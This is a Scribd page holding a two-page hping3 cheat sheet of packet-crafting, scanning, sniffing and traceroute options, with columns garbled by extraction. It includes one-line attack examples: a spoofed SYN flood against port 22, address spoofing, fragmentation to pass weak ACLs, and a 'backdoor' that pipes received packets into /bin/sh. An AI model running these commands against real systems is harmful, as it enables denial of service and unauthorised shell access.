Scribd Logo
Upload

Welcome to Scribd!

  • 270 views

    GX-CS - Cheat Sheet - Hping3

    Uploaded by

    bogeybogey6891
    Hping3 is a tool for TCP/IP packet generation, sniffing and manipulation. It supports ICMP, UDP, TCP and RAW-IP protocols, with different modes for tasks like scanning, fuzzing and traceroute. Common options allow specifying the interface, target address, packet count and timing. More advanced options control flags, ports and other fields for customizing packets.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    GX-CS - Cheat Sheet - Hping3

    Uploaded by

    bogeybogey6891
    270 views2 pages
    Hping3 is a tool for TCP/IP packet generation, sniffing and manipulation. It supports ICMP, UDP, TCP and RAW-IP protocols, with different modes for tasks like scanning, fuzzing and traceroute. Common options allow specifying the interface, target address, packet count and timing. More advanced options control flags, ports and other fields for customizing packets.

    Original Title

    GX-CS - Cheat Sheet - hping3

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Hping3 is a tool for TCP/IP packet generation, sniffing and manipulation. It supports ICMP, UDP, TCP and RAW-IP protocols, with different modes for tasks like scanning, fuzzing and traceroute. Common options allow specifying the interface, target address, packet count and timing. More advanced options control flags, ports and other fields for customizing packets.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    270 views2 pages

    GX-CS - Cheat Sheet - Hping3

    Uploaded by

    bogeybogey6891
    Hping3 is a tool for TCP/IP packet generation, sniffing and manipulation. It supports ICMP, UDP, TCP and RAW-IP protocols, with different modes for tasks like scanning, fuzzing and traceroute. Common options allow specifying the interface, target address, packet count and timing. More advanced options control flags, ports and other fields for customizing packets.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    You are on page 1of 2

    Hping3 Cheat Sheet

    by myke670 via cheatography.com/149090/cs/32423/

    Usage: For ICMP use: Mode use: Default Mode TCP

    hping3 -h - show this help hping3 -C icmp type (default echo hping3 RAW IP mode
    -help -- request) -0 --
    hping3 -v - show version icmptype rawip

    -version hping3 -K icmp code (default 0) hping3 ICMP mode


    hping3 -c - packet count -- -1 --
    -count icmpcode icmp

    hping3 -i -- wait (uX for X micros​econds, hping3 -- send all icmp types (default hping3 UDP mode
    interval for example -i u1000) forc​e- send only supported types) -2 --
    icmp udp
    hping3 -- alias for -i u1000 (10 packets
    fast for second) hping3 -- set gateway address from ICP hping3 SCAN mode (Example: hping --
    icmp-gw redirect (default 0.0.0.0) -8 -- scan 1-30,70-90 -S www.ta​rge​‐
    hping3 -- alias for -i u1000 (100 packets
    hping3 -- Alias for --icmp --icmptype 13 scan t.host
    faster for second)
    icmp-ts (ICMP timestamp) hping3 listen mode
    hping3 -- sent packets as fast as
    hping3 -- Alias for --icmp --icmptype 17 -9 --
    flood possible. Dont show replies.
    icmp​-addr (ICMP address subnet mask) listen
    hping3 -n - numeric output
    -numeric hping3 -- display help for others icmp
    UDP/TCP parame​ters:
    icmp​-help options
    hping3 -q - quiet
    -s --base​‐ base source port (default
    -quiet
    ARS packet descri​ption (new, unstable) report random)
    hping3 -I - interface name (otherwise
    -- Send the packet described with -p -- [+][+]​<po​rt> destin​ation port
    -inte​rface default routing interface)
    apd- APD (see docs/A​PD.txt) destport (default 0) ctrl+z inc/dec
    hping3 -V verbose mode
    send -k --keep keep still source port
    --verbose
    -w --win winsiz (deafult 64)
    hping 3 -D debugging info Fuzzing:
    -O -- set fake tcp data offset (insted
    --debug
    hping3 -2 basis UPD traceroute tcpoff of tcphdrlen /4)
    hping3 -z - bind ctrl+z to ttl (default to dst
    [4.2.2.1] -P fuzzing, if stuck press
    -Q -- shows only tcp sequence
    -bind port)
    ++44444 -T CTRL+Z to skip unresp​‐
    seqnum number
    hping3 -Z unbind ctrl+z -n onsive hop.
    -b -- (try to) send packets with a
    --unbind
    badcksum bad IP checksum, many
    hping3 -- beep for every matching
    systems will fix the IP
    beep packet received
    checksum sending the packet
    so you'll get bad UDP/TCP
    checksum instead.
    -M -- set TCP sequence number
    setseq

    By myke670 Not published yet. Sponsored by Readable.com


    cheatography.com/myke670/ Last updated 10th June, 2022. Measure your website readability!
    Page 1 of 2. https://readable.com
    Hping3 Cheat Sheet
    by myke670 via cheatography.com/149090/cs/32423/

    UDP/TCP parame​ters: (cont) For IP use: Common:

    -L -- set TCP ack -a -- spoof source address -d -- data size


    setack spoof data
    -F --fin set FIN flag --rand​- random destin​ation address -E --file dta fromfile
    -S --syn set SYN flag dest mode. -e -- add 'signa​ture'
    -R --rst set RST flag --rand​- random source address mode. sign
    source -j -- dump packets in hex
    -P -- set PUSH flag
    push -t --ttl ttl (defau​lt64) dump

    -A --ack set ACK flag -N --id id (default random) -J -- dump printable characters
    -W -- use win* id byte ordering print
    -U --urg set URG flag
    winid -B -- enable 'safe' protocol
    -X -- set X unused flag (0x40)
    -r --rel relativize id field (to estimate safe
    xmas
    host traffic) -u -- tell you when --file reached EOF
    -Y -- set Y unused flag (0x80)
    -f --frag split packets in more frag. (may end and prevent rewind
    ymas
    pass weak acl) -T -- traceroute mode (implies --bind
    --tcpe​‐ use last tcp->t​h_flags as exit
    -x -- set more fragment flag trac​‐ and --ttl 1)
    xitcode code
    morefrag eroute
    --tcp- enable the TCP MSS option with
    -y -- set don't fragment flag --tr- Exit when receive the first not
    mss the given value.
    dontfrag stop ICMP in traceroute mode
    --tcp-​‐ enable the TCP timestamp
    -g -- set the fragment offset --tr-k​‐ Keep the source TTL fixed,
    tim​‐ option to guess the HZ/uptime.
    fragoff eep-ttl useful to monitor just one hop
    estamp
    -m --mtu set virtual mtu, implies --frag if --tr-n​o- Don't calcul​ate​/show RTT inform​‐
    Sniffer: packet size > mtu rtt ation in traceroute mode

    hping3 - listening mode, intercept traffic -o --tos type of service (default 0x00),
    File Transfer:
    9 HTTP going through our machine's try --tos help
    -I eth0 network interface hping3 -1 [IP Addr] -9 transfer complete
    -G -- includes RECORD​_ROUTE
    signature -I eth0 receiving files
    rroute option and display the route
    Backdoor: buffer
    Flooding:
    hpin3 -I pipe receiving packets to --lsrr loose source routing and record
    eth1 -9 /bin/sh in order to create a route hping3 -S [Target IP Addr] -a classic
    secret | simple backdoor [IP Addr] -p 22 --flood attack
    --ssrr strict source routing and record
    /bin/sh flooding
    route
    -H -- set the IP protocol field, only in
    ipproto RAW IP mode

    By myke670 Not published yet. Sponsored by Readable.com


    cheatography.com/myke670/ Last updated 10th June, 2022. Measure your website readability!
    Page 2 of 2. https://readable.com

    You might also like